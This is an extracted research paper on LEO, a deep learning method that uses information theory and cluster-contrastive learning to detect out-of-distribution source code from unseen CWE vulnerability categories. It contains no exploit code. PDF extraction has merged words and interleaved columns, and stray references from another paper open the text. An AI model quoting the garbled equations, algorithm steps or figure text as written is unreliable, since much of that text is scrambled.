QuanjunZhang,YuanZhao,WeisongSun,ChunrongFang,ZiyuanWang,andLingmingZhang.2022.ProgramRepair: Automatedvs.Manual.arXivpreprintarXiv:2203.05166(2022). [59] YaqinZhou,ShangqingLiu,JingkaiSiow,XiaoningDu,andYangLiu.2019.Devign:Effectivevulnerabilityidentification bylearningcomprehensiveprogramsemanticsviagraphneuralnetworks.InInProceedingsofthe33rdInternational ConferenceonNeuralInformationProcessingSystems.10197–10207. [60] QihaoZhu,ZeyuSun,Yuan-anXiao,WenjieZhang,KangYuan,YingfeiXiong,andLuZhang.2021.Asyntax-guided
editdecoderforneuralprogramrepair.InProceedingsofthe29thACMJointMeetingonEuropeanSoftwareEngineering ConferenceandSymposiumontheFoundationsofSoftwareEngineering.341–353. [61] DanielMZiegler,NisanStiennon,JeffreyWu,TomBBrown,AlecRadford,DarioAmodei,PaulChristiano,and GeoffreyIrving.2019.Fine-tuninglanguagemodelsfromhumanpreferences.arXivpreprintarXiv:1909.08593(2019). ,Vol.1,No.1,Article.Publicationdate:April2024.
2404.05964 Deep Learning-Based Out-of-distribution Source Code Data Identification: How Far Have We Gone? Van Nguyen*,1,2 and Xingliang Yuan1 and Tingmin Wu2 and Surya Nepal2 Marthie Grobler2 and Carsten Rudolph1 1 Monash University, Australia 2 CSIRO’s Data61, Australia Abstract—Software vulnerabilities (SVs) have become a com- In practice, while AI-based models demonstrate notable mon, serious, and crucial concern to safety-critical security performances in multiple domain applications such as soft- systems.ThatleadstosignificantprogressintheuseofAI-based ware vulnerability detection (SVD), autonomous driving, and methods for software vulnerability detection (SVD). In practice, biometric authentication, they often obtain poor performances although AI-based methods have been achieving promising per- formancesinSVDandotherdomainapplications(e.g.,computer or fail to detect the ground-truth labels (e.g., the categories vision), they are well-known to fail in detecting the ground- of traffic signs or the vulnerability (e.g., vulnerable or non- truthlabelofinputdata(referredtoasout-of-distribution,OOD, vulnerable) of the source code samples) when encountering data) lying far away from the training data distribution (i.e., in- the input data (commonly referred to as out-of-distribution, distribution,ID).Thisdrawbackleadstoseriousissueswherethe OOD,data)significantlylyingfarawayfromthetrainingdata modelsfailtoindicatewhentheyarelikelymistaken.Toaddress this problem, OOD detectors (i.e., determining whether an input distribution [15], [18]–[20]. This limitation poses a serious is ID or OOD) have been applied before feeding the input data challenge as the models struggle to accurately identify in- to the downstream AI-based modules. stances when they are likely to make mistakes. In particular, While OOD detection has been widely designed for computer deeplearning-basedclassifiershavebeenshowntoincorrectly vision and medical diagnosis applications, automated AI-based classify the ground-truth labels of out-of-distribution data techniques for OOD source code data detection have not yet samples with high confidence [18], [21]. That can limit their been well-studied and explored. To this end, in this paper, we propose an innovative deep learning-based approach addressing adoption as well as cause unexpected crucial accidents in the OOD source code data identification problem. Our method safety-critical systems such as medical and security domains. is derived from an information-theoretic perspective with the This problem is particularly severe within the cyber security use of innovative cluster-contrastive learning to effectively learn realm. Hackers can create new vulnerabilities (with the assis- and leverage source code characteristics, enhancing data rep- tance of domain experts and AI-based tools, e.g., generative resentation learning for solving the problem. The rigorous and comprehensive experiments on real-world source code datasets large language models) and exploit these zero-day (a.k.a. out- showtheeffectivenessandadvancementofourapproachcompared of-distribution) vulnerabilities associated with emerging CWE tostate-of-the-artbaselinesbyawidemargin.Inshort,onaverage, categories1 to compromise software security systems until our method achieves a significantly higher performance from appropriate measures are taken to address the issue. around 15.27%, 7.39%, and 4.93% on the FPR, AUROC, and The problems of out-of-distribution (a.k.a anomaly) result AUPR measures, respectively, in comparison with the baselines. in rapid progress in the use of advanced machine learning I. INTRODUCTION and deep learning for OOD detection before feeding input data samples to the downstream AI-based modules. How- Software vulnerabilities (SVs), known as specific flaws or ever, though achieving significantly promising performance oversights in software programs allowing attackers to exploit for OOD detection, almost all existing methods are mainly the code base and potentially undertake dangerous activities basedonorapplicabletoimagesincomputervision[23]–[28] (e.g., exposing sensitive information or taking control of a or genomics sequences in medical diagnosis [29], automated computer system) [1], have become a common, serious, and deeplearning-basedtechniquesfordetectingOODsourcecode crucial issue to safety-critical security. There have been many datahavenotyetbeenwellstudiedandexplored.Furthermore, methods proposed for software vulnerability detection (SVD) we observed that these methods cannot be straightforwardly ranging from open-source to commercial tools, and from applied in the context of out-of-distribution source code iden- manual to automatic methods [2]–[17] based on machine tification due to the differing nature of source code data learninganddeeplearningapproaches(i.e.,AI-basedmodels). comparedwithimagesandgenomicssequences.Motivatedby *Corresponding Author (van.nguyen1@monash.edu). Van Nguyen is a 1CWE stands for Common Weakness Enumeration. It is a community- Postdoctoral Research Fellow at the Department of Software Systems and developed list of common security weaknesses that software developers, CybersecurityatMonashUniversity,Australia.Additionally,heisanAffiliate testers, and security professionals can use to identify and mitigate vulner- atCSIRO’sData61,Australia. abilitiesinsoftwaresystems[22]. 4202 rpA 51 ]RC.sc[ 2v46950.4042:viXrathis problem, in this paper, we study the research questions: identificationproblem.Viathispaper,wedemonstratethatthe Given an in-distribution (ID) source code dataset D ability to capture the characteristics of source code data as in well as figure out and leverage the relationships of hidden (associated with one or multiple CWE categories hav-
vulnerability patterns inside and between source code data ing both vulnerable and non-vulnerable source code samples for boosting the data representation learning plays data samples), how to develop an effective method that a key role in OOD source code data identification. can successfully identify whether an input source code data sample is from D in or from an out-of-distribution In particular, our approach consists of two phases. In the (OOD) CWE category? What are the main challenges training phase, we propose an elegant training principle and characteristics of source code data that need to be based on information theory and cluster-contrastive learning considered? (in the scope of our paper, we name this for effectively learning and leveraging the characteristics of problem as OOD source code data identification) source code data to boost the data representation learning process. During the training phase, our proposed approach When considering source code data, we notice that var- enhances the learning of semantic relationships inside and ious instances of vulnerable source code data, associated between source code data samples for forming clear bound- with different CWE categories (e.g., buffer overflow error aries between source code data consisting of different hidden or resource management error), frequently stem from distinct vulnerability patterns (i.e., note that in the latent space, the hidden vulnerability patterns [22]. Furthermore, in each vul- representations of vulnerable source code data sharing the nerablesourcecodesample(i.e.,afunctionoraprogram),the samehiddenvulnerabilitypatterntendtoformacorresponding hiddenvulnerabilitypatternemergesfromtheintricateseman- cluster) in the latent space for the training set of the in- tic relationships between vulnerability-relevant source code distribution data (D ). In the testing (inference) phase, statements. Therefore, to figure out the difference between in inspired by [26], [27], [30], we use the cluster-conditioned source code data from various CWE categories that support detection method (using the Mahalanobis distance [31]) to identifyingOODCWEsourcecodedata,especiallythosethat calculate the outlier score s(X) for each testing input data are vulnerable, the corresponding method needs to have the sample X in the latent space with respect to the training ability to learn and recognize the important and vulnerability- data set (i.e., D ). Based on the outlier score s(X), we relevant source code statements in each source code sample, in determine whether X is from out-of-distribution. Please refer particularly within the vulnerable data. to Section IV for a comprehensive explanation, visualization, Inaddition,weobservedsomecharacteristicsofsourcecode and algorithm of our method. data as follows: (i) source code data are complicated and different from texts or images due to consisting of complex In summary, our key contributions are as follows: semantic and syntactic relationships between code statements • We study an important problem of identifying OOD and code tokens, (ii) different source code data can share a sourcecodedata,whichplaysacrucialroleinstrengthen- significant amount of common background information (e.g., ing the defense of software security systems. Automated non-vulnerable code statements) while there are only a few machine learning and deep learning-based techniques for specificsourcecodestatementscausingthedatatobedifferent thisproblemhavenotyetbeenwellstudiedandexplored. and vulnerable. This problem requires an appropriate solution to learn and figure out vulnerable parts inside vulnerable data • Weproposeaninnovativeinformation-theoreticlearning- for being able to distinguish non-vulnerable and vulnerable basedapproachtoidentifyout-of-distributionsourcecode source code data samples, and (iii) although having the same data samples (i.e., functions or programs). Our approach vulnerabilitylabel(e.g.,vulnerabilitytype,i.e.,bufferoverflow canautomaticallylearnthecharacteristicsofsourcecode error, or vulnerable one in general), there are still many data as well as also figure out and leverage the semantic different hidden vulnerability patterns causing source code relationships of hidden vulnerability patterns inside and data samples to be classified as vulnerable. Therefore, an ele- between source code data samples to boost the data rep- gant mechanism for automatically figuring out and separating resentation learning, enabling the identification of OOD vulnerable source code samples consisting of different hidden sourcecodedata.Tothebestofourknowledge,ourwork vulnerabilitypatternsisessentialforensuringrobustrepresen- isoneofthefirstmethodsproposedtosolvetheproblem. tation learning for OOD source code data identification. It can serve as an effective baseline for solving the OOD Tothisend,inthispaper,weproposeanoveldeeplearning- source code data identification problem. based approach that can learn and leverage the characteristics • We comprehensively evaluate and compare our proposed of source code data to automatically figure out the important approach with state-of-the-art baselines on real-world and vulnerability-relevant source code statements, forming source code data covering many CWE categories. Our the corresponding hidden vulnerability patterns to vulnerable extensive experiments show that our approach obtains source code data. In addition, our approach can also utilize a significantly higher performance than the baselines in the semantic relationships of vulnerability patterns inside and three main measures including FPR (at TPR 95%), AU- betweensourcecodedatasamplestoboostthedatarepresenta- ROC, and AUPR, widely utilized in out-of-distribution tionlearningthatfacilitatessolvingtheOODsourcecodedata identification methods, as noted in [24], [27], [29]. 2II. MOTIVATIONS III. RELATEDWORK A. Out-of-distribution (OOD) data identification A. Theimpactofout-of-distribution(OOD)sourcecodedata There have been many AI-based methods (i.e., machine Out-of-distribution (a.k.a. zero-day) source code data, es-
learning-based and deep learning-based approaches) intro- pecially vulnerable ones, are considered highly serious in the duced for out-of-distribution detection widely applied to realm of cyber-security due to their potential for exploitation computer vision and medical diagnosis applications [24]– before the affected software (system) has a chance to defend [27], [29], [30], [33]–[44]. Although existing methods have againstthem.AttackerscanexploitOODvulnerabilities(asso- achieved promising results for out-of-distribution detection, ciatedwithemergingCWEcategories)tocompromisesystems they are mainly based on or only applicable to computer before the developers or security community becomes aware. vision applications or medical diagnosis. Automated deep This gives hackers a head start in deploying attacks. learning-based techniques for out-of-distribution source code The effect of out-of-distribution vulnerability attacks can dataidentificationhavenotyetbeenwellstudied.Inourpaper, be far-reaching, as they can compromise sensitive data, dis- we apply some state-of-the-art out-of-distribution detection rupt critical infrastructure, and cause financial losses. For methods (e.g., [24], [27], [45]) to the problem of identifying instance, the WannaCry ransomware attack in 2017 exploited OOD source code data. We then proceed to evaluate and a vulnerability in Microsoft Windows and affected more than compare the performance of these models against our method 200,000 computers in 150 countries. Also in 2017, a zero-day (pleaserefertotheExperimentsection(SectionV)fordetails). vulnerabilityintheEquifaxcreditreportingagency’ssoftware was exploited, resulting in the theft of sensitive personal and B. Software vulnerability detection (SVD) financialinformationbelongingtoover140millioncustomers. AI-based approaches have been widely proposed for SVD, Consequently, Equifax suffered substantial financial and repu- ranging from utilizing handcrafted features manually selected tational harm, paying over $1 billion in compensation, facing by domain experts [3]–[7], to leveraging automatic feature lawsuits, and dealing with regulatory penalties. learning through deep learning-based methods [8]–[10], [12], [15],[46]–[54],showcasingnotableadvancementsinthefield. B. The need for OOD source code data identification Although achieving significant performances in SVD, AI- based methods often achieve poor performances or struggle Theincidentsresultingfromout-of-distribution(OOD)vul- when encountering input data situated distantly from the nerability attacks have grown increasingly severe, particularly training data distributions [15], [20], [32]. In our paper, we in the era of generative machine learning. With the assistance also investigate if effective methods in SVD can be applied to of domain experts and AI-based tools, e.g., generative large identifying out-of-distribution source code data. The rationale language models, hackers can create and exploit unknown is that an effective model should produce high-quality data vulnerabilities to compromise software security systems until representations that facilitate distinguishing the data between appropriate measures are taken to address the issue. in-distribution (ID) and out-of-distribution (OOD). Software vulnerability detection (SVD) AI-based methods We employ effective and state-of-the-art SVD methods havebeenproposedanddeployedinsoftwaresecuritysystems including [8], [15], [55]. VulDeePecker [8] is considered to enhance their defense in detecting the data’s vulnerabil- one of the most effective deep learning-based SVD methods ity (e.g., vulnerable or non-vulnerable). Although achieving leveragingthepowerofbi-directionallong-short-termmemory promisingperformancesforSVD,AI-basedmethodscanonly (LSTM) networks. CodeBERT [55] is a pre-trained model work well with the input data from the same distribution as (based on the Transformer’s encoder framework [56]) that thedatausedtotrainthemodels.Whenthedatahavedifferent specializes in the programming language. Via CodeBERT, we representations or lie far away from the training data distri- aim to investigate how large language models work in the bution, AI-based methods often achieve poor performances or context of out-of-distribution source code data identification. fail to detect the data vulnerability [15], [20], [32]. ReGVD [15] is a simple yet effective graph neural network- Out-of-distribution vulnerabilities associated with emerging based model for the SVD problem. CWE source code categories arise annually [22], prompting the need for solutions to enhance the defense of software se- C. The difference tasks between source code vulnerability curitysystems.Toaddressthisissue,theidentificationofOOD detection and OOD source code identification sourcecodedataappearsasapromisingapproach.TheOOD The task of identifying OOD source code data differs sourcecodedataidentificationtaskhelpsdetermineifaninput from that of source code vulnerability detection. In the OOD is from a learned in-distribution (ID) or out-of-distribution identificationtask,theobjectiveissolelytodeterminewhether (OOD). That enables the system and security experts to take input data is from established in-distribution categories or appropriate precautions and actions. In particular, this stage from an out-of-distribution category while in vulnerability assists in identifying potential OOD CWE source code data detection, we aim to detect the vulnerability (e.g., vulnerable outside the established in-distribution CWE source code data or non-vulnerable) of the data. The OOD identification stage categories to harden the software security systems before the assists the security systems and experts in identifying OOD input data is fed into subsequent AI-based modules. sourcecodedataoutsidetheestablishedin-distributiondatafor 3conductingappropriateprecautionsandactionsbeforefeeding y!!"
input data into subsequent AI-based modules, including the Innovative cluster-contrastive Classifier 𝑓(.,𝛽) vulnerability detection phase. learning IV. THEPROPOSEDLEOAPPROACH Latent Space A. The problem statement We denote D as a real-world source code dataset (as- p!& !"(X) in sociated with one or multiple CWE categories) consisting of 𝑋3 !!":Important features (i.e., code {(X 1,Y 1),...,(X NDin,Y NDin)} where X i is a source code statements) of X!!" data sample (i.e., a function or a program) comprised of L 𝒛⨀X!!"(i.e., 𝑋3 !!") code statements from x to x while X ’s vulnerability label 1 L i Selection network 𝜁 Y ∈ {0,1} (i.e., 0: non-vulnerable and 1: vulnerable). From i parameterised by g(.,𝛼) the dataset D , we can build AI-based (machine learning in or deep learning) approaches to detect the vulnerability (i.e., X!!" benign or vulnerable) of the source code data sampled from 𝐷"#= X$,y$,…, X%#!",y%#!" where(X!!",y!!")~ p!!"X,y the distribution D ; however, they are known to fail against in Fig. 1: A visualization of our proposed LEO method for the data samples (outliers or out-of-distribution) that lie far effectively improving the source code data representation away from the data distribution D with high confidence. in learningprocesstosolvetheout-of-distribution(OOD)source In software security systems, the OOD source code data code data identification problem. identificationprocessenablesthemodelandsecurityexpertsto takeappropriateprecautionsandactions,beforefeedingsource code input data into subsequent AI-based modules. In our hidden vulnerability patterns will be trained to have different study, given an in-distribution source code dataset D , in representations, causing them to be situated far apart from we aim to develop a deep learning-based approach that each other while the source code data sharing similar hid- can effectively identify whether an input source code data den vulnerability patterns are encouraged to remain closely sample is from a learned in-distribution D or from an in clustered. This process elegantly facilitates out-of-distribution out-of-distribution D CWE category. out source code data identification. B. Methodology a) Motivations for important code statement selection In what follows, we present the details of how our to boost the data representation learning process: In ev- LEO method works and addresses the out-of-distribution ery source code data sample, a few certain code statements source code data identification problem. We first describe the typically hold greater significance than others in contributing process of our LEO method taking into account the source to the corresponding vulnerability, especially in vulnerable code characteristics and working to automatically learn and source code data. These important and vulnerability-relevant figureouttheimportantandvulnerability-relevantsourcecode statementsoftenconstitutetheunderlyinghiddenvulnerability statements, forming the corresponding hidden vulnerability patterns within the vulnerable source code data, as illus- patterns in vulnerable source code data, contributing to robust trated in examples in Figure 3. In contrast, the vulnerability- source code data representation learning for facilitating out- irrelevantcodestatementscanbesharedamongdifferentnon- of-distributionsourcecodedataidentification.Wethenpresent vulnerable and vulnerable data, potentially compromising the oureffectivesolutionforleveragingthesemanticrelationships model’s capability to learn the representations of vulnerable ofhiddenvulnerabilitypatternsinsideandbetweenthesource data. Hence, the automatic learning and identification of criti- codesamples(i.e.,functionsorprograms)byutilizinginnova- cal code statements within each source code data sample play tive cluster-contrastive learning to further improve the source a pivotal role in advancing the data representation learning code data representation learning process. process. This facilitates the distinction not only between non- vulnerable and vulnerable data but also between data exhibit- 1) The selection of important features (i.e., source code ing different hidden vulnerability patterns. statements): As depicted in Figure 1, our LEO method starts with a selection network ζ for automatically learning and b) Selection network for choosing important and label- figuring out the crucial and label-relevant code statements relevant code statements in each source code data sample: in each source code data (a function or a program). It is Giving a source code data sample X consisting of L code important to highlight that to vulnerable source code data, statements from x to x , to select the important and vul- 1 L the identified code statements constitute the corresponding nerability label-relevant code statements (denoted by X˜) of vulnerability patterns, rendering the data vulnerable. Through X, we design a selection model ζ parameterized by a neural the selection network with the use of innovative cluster- network g(.,α). The network g takes X = {x }L as the i i=1 contrastive learning (refer to section IV-B2 for details), in input and outputs the corresponding p={p }L where each i i=1 the latent space, the source code data containing different p presents the probability of x related to the vulnerability Y i i 4of X. In practice, each code statement x is represented as a network f(X˜;β), which takes X˜ as input and outputs its i vector using a learnable embedding method described in the corresponding label Y (i.e., we view the classifier model as a data processing and embedding section. distribution q (Y|X˜;β)). class We then construct X˜ = ζ(X) (i.e., the subset code The aim is then to learn both the selection model and the statements that lead to the vulnerability Y of the function classifier by maximizing the following objective function: X) by X˜ = X ⊙ z with z ∼ MultiBernoulli(p) = (cid:81)L Bernoulli(p ) and the element-wise product ⊙ as de- max(cid:8) E E [logq (Y|X⊙z;β)](cid:9) (4)
i=1 i α,β X,Y z∼qsel(z|X;α) class picted in Figure 2. Note that we can view the selection d) Ensuring the selection of meaningful code state- model ζ as a distribution q (z|X;α) over a selector variable sel ments: Thejointtrainingprocessbetweentheclassifierf(.,β) z which indicates the important features (i.e., source code statements) of a given sample X (i.e., each z in z={z }L and the selection network g(.,α) brings benefits for selecting i i i=1 theimportantandlabel-relevantfeaturesfromthecorrespond- indicates if x is significant in leading the vulnerability Y of i ing data. However, this process can also cause a potential X. Specifically, if z is equal to 1, the statement x plays an i i limitation.Inparticular,thepredictionsoftheclassifierf(.,β) important role in causing the vulnerability Y). may rely more on the features selected by the selection To make the selection process (i.e., consisting of sampling network g(.,α) than on the underlying information contained operationsfromaMulti-Bernoullidistribution)continuousand within those features. Consequently, the selected information differentiable during training, we apply the Gumbel-Softmax (i.e., statements) may represent arbitrary subsets of the entire trick [57], [58] for relaxing each Bernoulli variable z . i set of statements, rather than meaningful ones from the data. c) Information theory-based learning to guide the se- lection process: It is important to highlight that the source Y code data X (as well as its X˜) and its vulnerability label Y possess mutual information (i.e., the information conveyed by m &,a (xΕ),*Ε𝐳~-!"#(𝐳|);&)[logq23455(Y|X⨀𝐳;β)] Y providesinsightsintothevalueofX (aswellasX˜)andvice versa). Therefore, to guide the selection network in obtaining the important and label-relevant code statements X˜ (i.e., X˜ Classifier f(.;𝛽) can predict the vulnerability Y of X correctly), inspired by [14], [59], we apply to use the information theory principle [ b th6 e a0 tw t], be[ ye6 n1 u] sX. ˜ inI gn an tp d ha er Yt ii nc au fosla rm mr, e aw n tie t oio nm n fa e rx d oi mm ini Yz Ee ,qt t.h h(e e1m ) sewu let iu ctha til oti h nn ef po i rnr om t cu ea i st ti i so o ζn n X 𝐱 𝐱 𝐱𝐱 …! " # $ Se pl ae rc at mi go e (n .t en ;𝛼re it z )w edo r bk y 𝜁 𝐳 …0 1 1 0 X$ 𝐱 𝐱 …𝟎 𝟎" # willbelearnedandenforcedtoobtainthemostmeaningfulX˜ 𝐱% 1 N𝐱 o% te that X$=𝑋⨀𝒛 (i.e., X˜ can predict the vulnerability Y of X correctly). Fig.2:Avisualizationofthejointtrainingprocessoftheclas- max I(X˜,Y). (1) sifier and the selection model process guided by maximizing ζ mutual information between X˜ and Y. Following [61], we expand Eq. (1) further as the Kullback- To this end, we present an underlying-data-distribution Leibler divergence (i.e., it measures the difference in the mechanism to ensure the learnable selection process ζ re- information of two distributions) of the product of marginal distributions of X˜ and Y from their joint distribution: specting the data distribution to select both the significant and label-relevantinformationofthedata.Inparticular,inaddition I(X˜,Y)=(cid:90) p(X˜,Y)log p(X˜,Y) dX˜dY (2) to learning the classifier jointly with the selection network as p(X˜)p(Y) mentionedinEq.(4),inspiredby[62],weproposetolearnthe classifier model f(.,β) disjointly to approximate the ground In practice, estimating mutual information is challenging truthconditionaldistributionofY givensubsetsofX denoted as we typically only have access to samples but not the by X where X = X ⊙r with r ∼ MultiBernoulli(0.5) underlying distributions. Therefore, to estimate mutual in- R R (denoted by r ∼ B(0.5) for short). This procedure aids in formation in Eq. (2), we employ a variational distribution q(Y|X˜) to approximate the posterior p(Y|X˜), hence deriving adjustingtheclassifier,enablingittobeinfluencednotonlyby a variational lower bound of I(X˜,Y), for which the equality theinformationobtainedfromtheselectionnetworkζ butalso holds if q(Y|X˜)=p(Y|X˜), as follows: bytheunderlyinginformationfromthedatawhenupdatingits parameterβ.Thisprocessisformalizedaslearningq (.;β) class (cid:90) q(Y|X˜) to maximize: I(X˜,Y)≥ p(Y,X˜,X)log dYdX˜dX p(Y) E E {logq (Y|X⊙r;β)} (5) =E E [logq(Y|X˜)]+const (3) X,Y r∼B(0.5) class X,Y X˜|X Tomakethisprocess,involvingsamplingoperationsfroma We model the variational distribution q(Y|X˜) presented Multi-Bernoulli distribution, remain continuous and differen- in Eq. (3) by using a classifier implemented with a neural tiable during training, we employ the Gumbel-Softmax trick 5[57], [58]. This technique relaxes each Bernoulli variable samples in the latent space to group vulnerable samples with r ∈r using the RelaxedBernoulli distribution function [63]. the same vulnerability patterns into clusters before employing i 2) Innovative cluster-contrastive learning for improving contrastive learning to force vulnerable data to become more source code data representation learning: similar in the same clusters and to be pushed far way in a) Motivation: Using contrastive learning [64] for im- different clusters as follows: proving data representations has been widely applied to com- L =(cid:88) 1 −1 (cid:88) log exp(sim(X˜ i,X˜ c)/τ) puter vision domain applications from vision classification, ccl Yi=1|C(i)| (cid:80) exp(sim(X˜ ,X˜ )/τ) i∈I c∈C(i) i a detection, and segmentation [65]–[69] to vision data out-of- a∈A(i) (6)
distribution detection [27]. Its main idea is to encourage the where I ≡ {1...m} is a set of indices of input data in a data having the same label to share the close representations. specific mini-batch. A(i)≡I \{i} while C(i)≡{c∈A(i): In our study, we also aim to explore the potential of Y¯ =Y¯ andY =1}isthesetofindicesofvulnerablesource c i i contrastivelearningtoenhancethelearningprocessforsource code samples (labeled 1) which are in the same cluster as F i code data representation learning. However, via our obser- excepti,and|C(i)|isitscardinality.Here,weapplyk-means vations, it seems to be overdoing and not appropriate when for each mini-batch and denote Y¯ as the cluster label of the i straightforwardly applying contrastive learning to the source data sample X˜ . For the sim(.,.) function, we apply cosine i code data because even from the same vulnerability label, similarity.Notethattoformthecorrespondingvectorforeach source code data can often consist of different hidden vulner- X˜ in the latent space for calculating the cosine similarity, we i ability patterns causing them vulnerable (in our experiment in simply concatenate all vectors where each vector stands for a Section V, we demonstrate this observation by comparing our representation of a code statement in X˜ ). i LEO method with one of the most effective OOD approaches Itisworthnotingthatcluster-contrastivelearningdescribed using contrastive learning, namely SSD [27]). in Eq. (6) helps enforce important properties of the source As illustrated in Figure 3, despite sharing the same vulner- code data including (i) the vulnerable and non-vulnerable ability Y label (e.g., CWE categories, e.g., buffer overflow source code samples should have different representations, error), there are still several different hidden vulnerability (ii) the vulnerable source code samples from different hidden patternscausingthesourcecodedatasamplestobevulnerable. vulnerability patterns are also encouraged to have different Consequently, although in the same vulnerability Y label, representations while (iii) the vulnerable source code samples the representations of vulnerable source code samples formed in the similar hidden vulnerability patterns are trained to have from different hidden vulnerability patterns need to be dif- closerepresentations.Ensuringthesepropertieshelpsimprove ferent. Otherwise, when they are from the same vulnerability the selection process. That helps boost the source code data patterns, their representations should be close or similar. To representation learning facilitating out-of-distribution source ensure these properties and leverage the power of contrastive code data identification. learning to further improve the data representation learning 3) A summary of our LEO method: Algorithm1exhibits process, we propose using innovative cluster-contrastive. the details of our proposed LEO method in the training and testing phases. a) The training phase: In brief, during the training pro- cess,weupdatetheparametersαandβ oftheselectionmodel ζ parameterized by g(.,α) and the classifier model f(.,β) simultaneously through the objective functions presented in Eqs. (4, 5, and 6). After the training phase, our objective is to leveragetheoptimaltrainedselectionnetworktocreatedistinct representations in the latent space for source code data stem- mingfromdifferenthiddenvulnerabilitypatterns.Thisensures they are positioned far apart, while source code data sharing Fig. 3: Two examples of vulnerability patterns causing the similar hidden vulnerability patterns remain closely clustered. buffer overflow error [22]. The left-hand function shows an This elegant process effectively facilitates the identification of example of the buffer copy without checking the size of the out-of-distribution source code data. input. The right-hand function exhibits an example of the impropervalidationofanarrayindex.Itonlyverifiesthearray b) Theinferencephase: Inspiredby[26],[27],[30],we index against the maximum length, not the minimum value. use the cluster-conditioned OOD detection method (i.e., ap- plying the Mahalanobis distance to calculate the outlier score b) Innovative cluster-contrastive learning: It is impor- s(X) for each testing sample X) in the latent space for OOD tant to highlight that vulnerable source code data samples source code data identification. The procedure for a cluster- originating from the same vulnerability patterns tend to have conditioned detection method is as follows: We first partition similar X˜ and form the corresponding cluster in the latent the features of in-distribution training data into K clusters space. Therefore, we first use clustering analysis (e.g., k- equal to the number of clusters used in cluster-contrastive means)ontherepresentationsX˜ ofthevulnerablesourcecode learning. We then compute the outlier score s(X) of each 6Algorithm 1: The algorithm of our proposed LEO method for out-of-distribution source code data identification. (cid:8) (cid:9) Input: An in-distribution source code dataset D = (X ,Y ),...,(X ,Y ) (associated with one or in 1 1 NDin NDin multiple CWE categories) where each source code data sample X consisting of L code statements from x to i 1 x while its vulnerability Y ∈{0,1} (i.e., 1: vulnerable and 0: non-vulnerable) will be used during the training L i phase. An out-of-distribution CWE source code data category D is used at the inference (testing) phase, out denoted as X . test We denote the number of training iterations nt; the mini-batch size m; the trade-off hyper-parameter λ; and the number of clusters used in cluster-contrastive learning K. We randomly partition D into the training set D and the validation set X . in train val 1 We initialize the parameters α and β of the selection model ζ parameterized by g(.,α) and the classifier model f(.,β), respectively. 2 Training Phase
3 for t=1 to nt do 4 Choose a mini-batch of source code data samples denoted by {(X i,Y i)}m i=1 from D train. 5 Update the classifier parameter β via minimizing the following cross-entropy loss L ce E E [L (Y,f (X⊙r)] using the Adam optimizer [70]. Note that minimizing this function is X,Y r∼B(0.5) ce β equivalent to maximizing the objective function mentioned in Eq. (5). 6 Update the classifier’s parameter β and the selection model parameter’s α via minimizing the following objective function E E [L (Y,f (X⊙z))+λL ] using the Adam optimizer. The L is described in Eq. X,Y z∼qsel(z|X;α) ce β ccl ccl (6). 7 end 8 Note that, after the training phase, we aim to obtain the optimal selection network for the source code data representation learning. The trained selection network can select the most meaningful and label-relevant source code statements, forming the hidden vulnerability pattern to vulnerable data, for each source code data in the learned in-distribution D to facilitate the model’s ability to identify out-of-distribution CWE source code data. in 9 Testing Phase 10 We partition D train into K clusters. In particular, we use k-means to cluster the entire training data representations in the latent space into K clusters equal to the number of clusters used in the innovative cluster-contrastive learning (mentioned in Eq. (6)). 11 ∀X i ∈X test (denoted as X i test). We use Mahalanobis distance to calculate the outlier (out-of-distribution) score for each testing data sample X as follows s(X )=min (X˜ −µ )⊤Σ−1(X˜ −µ ) where µ and Σ i test i test k i test k k i test k k k are the sample mean and sample covariance of cluster kth ∈K. In short, s =score(X˜ ,µ ,Σ ) Xtest test Xtrain Xtrain 12 ∀X i ∈X val (denoted as X i val). We use Mahalanobis distance to calculate the outlier (out-of-distribution) score for each validation data sample X as follows s(X )=min (X˜ −µ )⊤Σ−1(X˜ −µ ) where µ and Σ i val i val k i val k k i val k k k are the sample mean and sample covariance of cluster k-th ∈K. In short, s =score(G ,µ ,Σ ) Xval Xval Xtrain Xtrain 13 Calculate s Xval (threshold) at TPR=95%. (Note that the threshold value is chosen at TPR=95% as commonly used in OOD detection methods) 14 if (s(X i test)>s Xval) then 15 X i test is an out-of-distribution data. 16 else 17 X i test is an in-distribution data. 18 end Output: ∀X ∈X (denoted as X ) whether X is out-of-distribution data sample. i test i test i test 7testing input X as s(X) = min (X˜ −µ )⊤Σ−1(X˜ −µ ) by [71] which contains many types of CWE categories. The k k k k whereµ andΣ arethesamplemeanandsamplecovariance DiverseVul dataset contains 18,945 vulnerable functions and k k ofeachclusterkinK clusters.Wefinallycomparethisoutlier 330,492 non-vulnerable functions covering 150 CWEs. score with a threshold value to decide if the corresponding In the scope of our paper, we focus on conducting our input sample is OOD. experiments on the top most dangerous and popular common weaknessenumeration(CWE)categories[71]includingCWE- 119 (Improper Restriction of Operations within the Bounds V. EXPERIMENTS of a Memory Buffer), CWE-20 (Improper Input Validation), A. Experimental designs CWE-125(Out-of-boundsRead),CWE-200(ExposureofSen- The key goal of our experiments is to evaluate our sitiveInformationtoanUnauthorizedActor),CWE-787(Out- LEO method and compare it with state-of-the-art baselines of-boundsWrite),CWE-416(UseAfterFree),CWE-269(Im- for out-of-distribution source code data identification. Below, proper Privilege Management), CWE-94 (Improper Control we present the research questions of our paper. of Generation of Code (Code Injection)), CWE-190 (Integer (RQ1)CanourmethodsuccessfullyidentifyOODsource OverfloworWraparound),CWE-264(Permissions,Privileges, code data? How effective is it compared to baselines? and Access Controls), CWE-863 (Incorrect Authorization), CWE-862 (Missing Authorization), and CWE-287 (Improper For AI-based systems, being able to detect data that is out- Authentication). of-distribution can be critical to maintaining safe and reliable 2) Data processing and embedding: We preprocessed the predictions. Although achieving promising performances, cur- datasetsbeforeinjectingthemintoourproposed LEO method rent state-of-the-art OOD methods are mostly applied to com- and baselines. In particular, we standardized the source code puter vision and medical diagnosis applications. Automated datasamplesby(i)removingcomments,blanklines,andnon- deep learning-based approaches for OOD identification to the ASCII characters, and (ii) mapping user-defined variables to sourcecodedatahavenotyetbeenwellstudiedandexplored. symbolicvariablenames(e.g.,var1andvar2)anduser-defined To this end, we propose one of the first methods for OOD functions to symbolic function names (e.g., func1 and func2) sourcecodedataidentification.Wedemonstratethatbytaking using Treesitter [72]. We also replaced strings with a generic into account source code characteristics and leveraging the ”str” token. correlations of the potentially hidden vulnerability patterns We then embedded source code statements into vectors. inside and between the source code data samples from the For instance, consider the following statement (written in learned in-distribution D , we can significantly improve the in C/C++programminglanguage)for(var1=0;var1<10;var1++, source code data representation learning for boosting OOD we tokenize this statement into a sequence of tokens (i.e., source code data identification. for,(,var1,=,0,;,var1,<,10,;,var1,++,)), and then we used a
